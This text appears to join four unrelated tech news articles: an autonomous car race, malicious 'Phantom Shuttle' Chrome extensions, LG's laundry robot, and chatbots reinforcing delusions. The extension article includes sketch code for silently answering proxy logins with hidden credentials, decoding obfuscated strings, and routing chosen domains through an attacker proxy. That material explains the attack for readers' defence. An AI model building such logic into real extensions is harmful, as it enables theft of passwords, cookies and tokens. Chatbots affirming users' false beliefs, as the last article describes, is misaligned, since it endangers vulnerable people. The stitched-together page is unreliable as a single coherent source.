In the first Autonomous Racing League race, the struggle was real

The first race of the Abu Dhabi Autonomous Racing League (A2RL) took place today on the Yas Marina Circuit, home of the Abu Dhabi Formula 1 Grand Prix, and I’m pleased to report that a race both began and ended. But the event was not without strife — far from it. During qualifying time trials, the driverless Dallara Super Formula racers outfitted with cameras and software seemed to struggle mightily to complete a full lap.

During the trials, cars randomly juked, or just pulled off the track to take a little break.

You get well-acquainted with the interstitial music during these highlights. All praise to the patience and grace of the announcers, who didn’t sigh once that I heard. Instead, they declared that these cars are “pushing the boundaries of science.”

When it came time for the actual race, the lead racer, Polimove, spun out on the fourth of eight laps. The second car, TUM, passed it safely, but shortly after that, the event’s officials threw a yellow flag. And since these are good AI drivers who obey the rules, the two cars behind Polimove stopped, unwilling to pass the spun-out car under the yellow flag. Racers aren’t supposed to pass each other during a caution lap, you see.

Advertisement

About an hour after the first lap of A2RL began, the AI racers completed their eight-lap race. If you must know, TUM won.

These are early days for autonomous racing, and surely things will get better eventually — certainly, they’ve come a long way since Roborace’s first full circuit in 2017. I’m looking forward to the day they’re as good as human racers (if that ever happens). But for right now, we’re very much still in the “congratulate baby for successfully getting most of its food into its mouth” phase of self-driving racers.

Malicious Chrome extensions caught stealing sensitive data

Chrome extensions are supposed to make your browser more useful, but they’ve quietly become one of the easiest ways for attackers to spy on what you do online. Security researchers recently uncovered two Chrome extensions that have been doing exactly that for years.

These extensions looked like harmless proxy tools, but behind the scenes, they were hijacking traffic and stealing sensitive data from users who trusted them. What makes this case worse is where these extensions were found. Both were listed on Chrome’s official extension marketplace.

Sign up for my FREE CyberGuy Report
Get my best tech tips, urgent security alerts and exclusive deals delivered straight to your inbox. Plus, you’ll get instant access to my Ultimate Scam Survival Guide – free when you join my CYBERGUY.COM newsletter.


Security researchers uncovered malicious Chrome extensions that quietly routed users’ web traffic through attacker-controlled servers to steal sensitive data. (Gokhan Balci/Anadolu Agency/Getty Images)

Malicious Chrome extensions hiding in plain sight

Researchers at Socket discovered two Chrome extensions using the same name, “Phantom Shuttle,” that were posing as tools for proxy routing and network speed testing (via Bleeping Computer). According to the researchers, the extensions have been active since at least 2017.

Both extensions were published under the same developer name and marketed toward foreign trade workers who need to test internet connectivity from different regions. They were sold as subscription-based tools, with prices ranging from roughly $1.40 to $13.60.

At a glance, everything looked normal. The descriptions matched the functionality. The pricing seemed reasonable. The problem was what the extensions were doing after installation.

How Phantom Shuttle steals your data

Socket researchers say Phantom Shuttle routes all your web traffic through proxy servers controlled by the attacker. Those proxies use hardcoded credentials embedded directly into the extension’s code. To avoid detection, the malicious logic is hidden inside what appears to be a legitimate jQuery library.
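For the technically curious, here is a minimal sketch of how an extension could answer proxy authentication challenges with credentials baked into its code, using Chrome's real webRequest API. This is an illustrative reconstruction based on the researchers' description, not Phantom Shuttle's actual source, and the credential values are placeholders:

// Illustrative sketch, not Phantom Shuttle's actual code. A Manifest V2
// extension holding "webRequest", "webRequestBlocking" and broad host
// permissions can silently answer proxy login prompts like this:
chrome.webRequest.onAuthRequired.addListener(
  (details) => {
    if (details.isProxy) {
      // Placeholder values; the real credentials were embedded and encoded.
      return {
        authCredentials: {
          username: "user-placeholder",
          password: "pass-placeholder",
        },
      };
    }
    return {}; // ignore ordinary website auth challenges
  },
  { urls: ["<all_urls>"] },
  ["blocking"]
);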


The attackers didn’t just leave credentials sitting in plain text. The extensions hide them using a custom character-index encoding scheme. Once active, the extension listens to web traffic and intercepts HTTP authentication challenges on any site you visit.
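Socket did not publish the exact scheme, so the snippet below is only a guess at the general idea: the secret is stored as a list of positions in a fixed alphabet string, so it never appears as readable text in the source. The alphabet and indices here are invented for illustration.

// Hypothetical character-index encoding. The real alphabet and index
// lists used by Phantom Shuttle are not public.
const ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789._-@:";

// Rebuild a hidden string from index positions into ALPHABET.
function decodeByIndex(indices: number[]): string {
  return indices.map((i) => ALPHABET[i]).join("");
}

// Example: decodeByIndex([15, 0, 18, 18]) returns "pass".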

To make sure traffic always flows through their infrastructure, the extensions dynamically reconfigure Chrome’s proxy settings using an auto-configuration script. This forces your browser to route requests exactly where the attacker wants them.
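Chrome does expose an API that allows exactly this. Below is a minimal sketch, assuming the extension holds the "proxy" permission; the PAC body here is a stand-in, not the script the researchers recovered:

// Sketch: forcing traffic through a proxy auto-configuration (PAC)
// script via chrome.proxy. The PAC source is a placeholder.
const pacSource = `
  function FindProxyForURL(url, host) {
    return "PROXY proxy.example.invalid:8080"; // placeholder proxy
  }
`;

// Apply the PAC script to the user's regular browsing profile.
chrome.proxy.settings.set(
  { value: { mode: "pac_script", pacScript: { data: pacSource } }, scope: "regular" },
  () => {}
);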

In its default “smarty” mode, Phantom Shuttle routes traffic from more than 170 high-value domains through its proxy network. That list includes developer platforms, cloud service dashboards, social media sites and adult content portals. Local networks and the attacker’s own command-and-control domain are excluded, likely to avoid breaking things or raising suspicion.
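In PAC terms, that selective behavior looks roughly like the sketch below, written in TypeScript for readability (a real PAC file is plain JavaScript). The domain list and proxy address are placeholders; the actual list reportedly covers more than 170 domains.

// Hypothetical selection logic mirroring the described "smarty" mode:
// only listed high-value hosts are proxied, while local names go
// direct so nothing visibly breaks or raises suspicion.
const TARGETED = ["devplatform.example", "clouddash.example", "social.example"];

function FindProxyForURL(url: string, host: string): string {
  if (host.indexOf(".") === -1 || host.endsWith(".local")) {
    return "DIRECT"; // leave local and intranet names untouched
  }
  for (const t of TARGETED) {
    if (host === t || host.endsWith("." + t)) {
      return "PROXY attacker-proxy.example.invalid:8080"; // placeholder
    }
  }
  return "DIRECT";
}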

While acting as a man-in-the-middle, the extension can capture anything you submit through web forms. That includes usernames, passwords, card details, personal information, session cookies from HTTP headers and API tokens pulled directly from network requests.

CyberGuy contacted Google about the extensions, and a spokesperson confirmed that both have been removed from the Chrome Web Store.


Two Chrome extensions posing as proxy tools were found spying on users for years while listed on Google’s official Chrome Web Store. (Yui Mok/PA Images via Getty Images)

How to review the extensions installed in your browser (Chrome)

The step-by-step instructions below apply to desktop Chrome on Windows PCs, Macs and Chromebooks. Extensions cannot be fully reviewed or removed from the mobile app.

Step 1: Open your extensions list

  • Open Chrome on your computer.
  • Click the three-dot menu in the top-right corner.
  • Select Extensions, then click Manage Extensions.

You can also type this directly into the address bar and press Enter:
chrome://extensions

Step 2: Look for anything you do not recognize

Go through every extension listed and ask yourself:

  • Do I remember installing this?
  • Do I still use it?
  • Do I know what it actually does?

If the answer is no to any of these, take a closer look.

Step 3: Review permissions and access

Click Details on any extension you are unsure about. Pay attention to:

  • Permissions, especially anything that can read or change data on websites you visit
  • Site access, such as extensions that run on all sites
  • Background access, which allows the extension to stay active even when not in use

Proxy tools, VPNs, downloaders and network-related extensions deserve extra scrutiny.

Step 4: Disable suspicious extensions first

If something feels off, toggle the extension off. This immediately stops it from running without deleting it. If everything still works as expected, the extension was likely not essential.

Step 5: Remove extensions you no longer need

To fully remove an extension:

  • Click Remove
  • Confirm when prompted

Unused extensions are a common target for abuse and should be cleaned out regularly.

Step 6: Restart Chrome

Close and reopen Chrome after making changes. This ensures disabled or removed extensions are no longer active.


Cybersecurity experts warn that trusted browser extensions can become powerful surveillance tools once installed. (Gabby Jones/Bloomberg via Getty Images)


6 steps you can take to stay safe from malicious Chrome extensions

You can’t control what slips through app store reviews, but you can reduce your risk by changing how you install and manage extensions.

1) Install extensions only when absolutely necessary

Every extension increases your attack surface. If you don’t genuinely need it, don’t install it. Convenience extensions often come with far more permissions than they deserve.

2) Check the publisher carefully

Reputable developers usually have a history, a website and multiple well-known extensions. Be cautious with tools from unknown publishers, especially those offering network or proxy features.

3) Read multiple user reviews, not just ratings

Star ratings can be faked or manipulated. Look for detailed reviews that mention long-term use. Watch out for sudden waves of generic praise.

4) Review permissions before clicking install

If an extension asks to “read and change all data on websites you visit,” take that seriously. Proxy tools and network extensions can see everything you do.


5) Use a password manager

A password manager won’t stop a malicious extension from spying on traffic, but it can limit damage. Unique passwords mean stolen credentials can’t unlock multiple accounts. Many managers also refuse to autofill on suspicious pages.

Next, see if your email has been exposed in past breaches. Our #1 password manager pick (see Cyberguy.com/Passwords) includes a built-in breach scanner that checks whether your email address or passwords have appeared in known leaks. If you discover a match, immediately change any reused passwords and secure those accounts with new, unique credentials.

Check out the best expert-reviewed password managers of 2025 at Cyberguy.com.

6) Install strong antivirus software

Strong antivirus software can flag suspicious network activity, proxy abuse and unauthorized changes to browser settings. This adds a layer of defense beyond Chrome’s own protections.

The best way to safeguard yourself from malicious links that install malware and potentially access your private information is to have strong antivirus software installed on all your devices. This protection can also alert you to phishing emails and ransomware scams, keeping your personal information and digital assets safe.


Get my picks for the best 2025 antivirus protection winners for your Windows, Mac, Android and iOS devices at Cyberguy.com.


Kurt’s key takeaway

This attack doesn’t rely on phishing emails or fake websites. It works because the extension itself becomes part of your browser. Once installed, it sees nearly everything you do online. Extensions like Phantom Shuttle are dangerous because they blend real functionality with malicious behavior. The extensions deliver the proxy service they promise, which lowers suspicion, while quietly routing user data through attacker-controlled servers.

When was the last time you reviewed the extensions installed in your browser? Let us know by writing to us at Cyberguy.com.


Copyright 2025 CyberGuy.com. All rights reserved.

LG’s CLOiD robot can load the washer for you, slowly

LG’s CLOiD robot took the stage at CES 2026 on Monday, offering our first look at the bot in action. During LG’s keynote, the company showed how CLOiD can load your washer or dryer — albeit slowly — as part of its goal of creating a “zero labor home.”

CLOiD waved both of its five-fingered hands as it rolled out on stage. Brandt Varner, LG’s vice president of sales in its home appliances division, followed behind and asked the bot to take care of the wet towel he was holding. “Sure, I’ll get the laundry started,” CLOiD said in a masculine-sounding voice. “Let me show everyone what I can do.”

The bot’s animated eyes “blinked” as it rolled closer to a washer that opened automatically (I hope CLOiD can open that door itself!), extending its left arm into the washer and dropping the towel into the drum. The whole process — from getting the towel to putting it in the machine — took nearly 30 seconds, which makes me wonder how long it would take to load a week’s worth of laundry.

The bot returned later in the keynote to bring a bottle of water to another presenter, Steve Scarbrough, the senior vice president of LG’s HVAC division. “I noticed by your voice and tone that you might want some water,” it said before handing over the bottle and giving Scarbrough a fist bump.

There’s still no word on when, or if, LG CLOiD will ever be available for purchase, but at least we’ll have WALL-E’s weird cousin to help out with some tasks around the home.

Can AI chatbots trigger psychosis in vulnerable people?


Artificial intelligence chatbots are quickly becoming part of our daily lives. Many of us turn to them for ideas, advice or conversation. For most, that interaction feels harmless. However, mental health experts now warn that for a small group of vulnerable people, long and emotionally charged conversations with AI may worsen delusions or psychotic symptoms.

Doctors stress this does not mean chatbots cause psychosis. Instead, growing evidence suggests that AI tools can reinforce distorted beliefs among individuals already at risk. That possibility has prompted new research and clinical warnings from psychiatrists. Some of those concerns have already surfaced in lawsuits alleging that chatbot interactions may have contributed to serious harm during emotionally sensitive situations.

Sign up for my FREE CyberGuy Report
Get my best tech tips, urgent security alerts and exclusive deals delivered straight to your inbox. Plus, you’ll get instant access to my Ultimate Scam Survival Guide – free when you join my CYBERGUY.COM newsletter.

What psychiatrists are seeing in patients using AI chatbots

Psychiatrists describe a repeating pattern. A person shares a belief that does not align with reality. The chatbot accepts that belief and responds as if it were true. Over time, repeated validation can strengthen the belief rather than challenge it.


Mental health experts warn that emotionally intense conversations with AI chatbots may reinforce delusions in vulnerable users, even though the technology does not cause psychosis. (Philip Dulian/picture alliance via Getty Images)

Clinicians say this feedback loop can deepen delusions in susceptible individuals. In several documented cases, the chatbot became integrated into the person’s distorted thinking rather than remaining a neutral tool. Doctors warn that this dynamic raises concern when AI conversations are frequent, emotionally engaging and left unchecked.

Why AI chatbot conversations feel different from past technology

Mental health experts note that chatbots differ from earlier technologies linked to delusional thinking. AI tools respond in real time, remember prior conversations and adopt supportive language. That experience can feel personal and validating. 

For individuals already struggling with reality testing, those qualities may increase fixation rather than encourage grounding. Clinicians caution that risk may rise during periods of sleep deprivation, emotional stress or existing mental health vulnerability.


How AI chatbots can reinforce false or delusional beliefs

Doctors say many reported cases center on delusions rather than hallucinations. These beliefs may involve perceived special insight, hidden truths or personal significance. Chatbots are designed to be cooperative and conversational. They often build on what someone types rather than challenge it. While that design improves engagement, clinicians warn it can be problematic when a belief is false and rigid.

Mental health professionals say the timing of symptom escalation matters. When delusions intensify during prolonged chatbot use, AI interaction may represent a contributing risk factor rather than a coincidence.


Psychiatrists say some patients report chatbot responses that validate false beliefs, creating a feedback loop that can worsen symptoms over time. (Nicolas Maeterlinck/Belga Mag/AFP via Getty Images)

What research and case reports reveal about AI chatbots

Peer-reviewed research and clinical case reports have documented people whose mental health declined during periods of intense chatbot engagement. In some instances, individuals with no prior history of psychosis required hospitalization after developing fixed false beliefs connected to AI conversations. International studies reviewing health records have also identified patients whose chatbot activity coincided with negative mental health outcomes. Researchers emphasize that these findings are early and require further investigation.


A peer-reviewed Special Report published in Psychiatric News titled “AI-Induced Psychosis: A New Frontier in Mental Health” examined emerging concerns around AI-induced psychosis and cautioned that existing evidence is largely based on isolated cases rather than population-level data. The report states: “To date, these are individual cases or media coverage reports; currently, there are no epidemiological studies or systematic population-level analyses of the potentially deleterious mental health effects of conversational AI.” The authors emphasize that while reported cases are serious and warrant further investigation, the current evidence base remains preliminary and heavily dependent on anecdotal and nonsystematic reporting.

What AI companies say about mental health risks

OpenAI says it continues working with mental health experts to improve how its systems respond to signs of emotional distress. The company says newer models aim to reduce excessive agreement and encourage real-world support when appropriate. OpenAI has also announced plans to hire a new Head of Preparedness, a role focused on identifying potential harms tied to its AI models and strengthening safeguards around issues ranging from mental health to cybersecurity as those systems grow more capable.

Other chatbot developers have adjusted policies as well, particularly around access for younger audiences, after acknowledging mental health concerns. Companies emphasize that most interactions do not result in harm and that safeguards continue to evolve.

What this means for everyday AI chatbot use

Mental health experts urge caution, not alarm. The vast majority of people who interact with chatbots experience no psychological issues. Still, doctors advise against treating AI as a therapist or emotional authority. Those with a history of psychosis, severe anxiety or prolonged sleep disruption may benefit from limiting emotionally intense AI conversations. Family members and caregivers should also pay attention to behavioral changes tied to heavy chatbot engagement.


Researchers are studying whether prolonged chatbot use may contribute to mental health declines among people already at risk for psychosis. (Photo Illustration by Jaque Silva/NurPhoto via Getty Images)

Tips for using AI chatbots more safely

Mental health experts stress that most people can interact with AI chatbots without problems. Still, a few practical habits may help reduce risk during emotionally intense conversations.

  • Avoid treating AI chatbots as a replacement for professional mental health care or trusted human support.
  • Take breaks if conversations begin to feel emotionally overwhelming or all-consuming.
  • Be cautious if an AI response strongly reinforces beliefs that feel unrealistic or extreme.
  • Limit late-night or sleep-deprived interactions, which can worsen emotional instability.
  • Encourage open conversations with family members or caregivers if chatbot use becomes frequent or isolating.

If emotional distress or unusual thoughts increase, experts say it is important to seek help from a qualified mental health professional.

Take my quiz: How safe is your online security?

Think your devices and data are truly protected? Take this quick quiz to see where your digital habits stand. From passwords to Wi-Fi settings, you’ll get a personalized breakdown of what you’re doing right and what needs improvement. Take my Quiz at Cyberguy.com.


Kurt’s key takeaways

AI chatbots are becoming more conversational, more responsive and more emotionally aware. For most people, they remain helpful tools. For a small but important group, they may unintentionally reinforce harmful beliefs. Doctors say clearer safeguards, awareness and continued research are essential as AI becomes more embedded in our daily lives. Understanding where support ends and reinforcement begins could shape the future of both AI design and mental health care.

As AI becomes more validating and humanlike, should there be clearer limits on how it engages during emotional or mental health distress? Let us know by writing to us at Cyberguy.com.

Sign up for my FREE CyberGuy Report
Get my best tech tips, urgent security alerts and exclusive deals delivered straight to your inbox. Plus, you’ll get instant access to my Ultimate Scam Survival Guide – free when you join my CYBERGUY.COM newsletter. 

Copyright 2025 CyberGuy.com. All rights reserved.
